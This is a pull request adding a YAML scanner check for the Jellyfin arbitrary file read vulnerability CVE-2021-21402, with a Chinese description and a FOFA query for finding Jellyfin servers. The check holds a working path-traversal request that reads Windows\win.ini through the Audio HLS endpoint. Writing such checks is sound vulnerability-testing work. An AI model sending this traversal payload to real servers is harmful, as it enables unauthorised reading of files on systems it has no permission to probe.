### PR TITLE
jellyfin-file-read-cve-2021-21402

### DIFF
--- a/pocs/jellyfin-file-read-cve-2021-21402.yml
+++ b/pocs/jellyfin-file-read-cve-2021-21402.yml
@@ -7,4 +7,4 @@ rules:
 detail:
   author: Print1n(https://github.com/Print1n)
   links:
-    - "https://blog.csdn.net/qq_41503511/article/details/116274406"
+    - https://blog.csdn.net/qq_41503511/article/details/116274406

--- a/pocs/jellyfin-file-read-cve-2021-21402.yml
+++ b/pocs/jellyfin-file-read-cve-2021-21402.yml
@@ -1,0 +1,10 @@
+name: poc-yaml-jellyfin-file-read-cve-2021-21402
+rules:
+  - method: GET
+    path: "/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
+    expression: |
+      response.status == 200 && response.body.bcontains(b"for 16-bit app support")
+detail:
+  author: Print1n(https://github.com/Print1n)
+  links:
+    - "https://blog.csdn.net/qq_41503511/article/details/116274406"


### PR DESCRIPTION
## 本 poc 是检测什么漏洞的
Jellyfin 任意文件读取漏洞（CVE-2021-21402）
## 测试环境
fofa title="Jellyfin" || body="http://jellyfin.media"
## 备注
对[#1183]()的补充完善
![image](https://user-images.githubusercontent.com/73928418/127865002-ae8148a9-69d3-4409-93bb-49ad49afc0da.png)
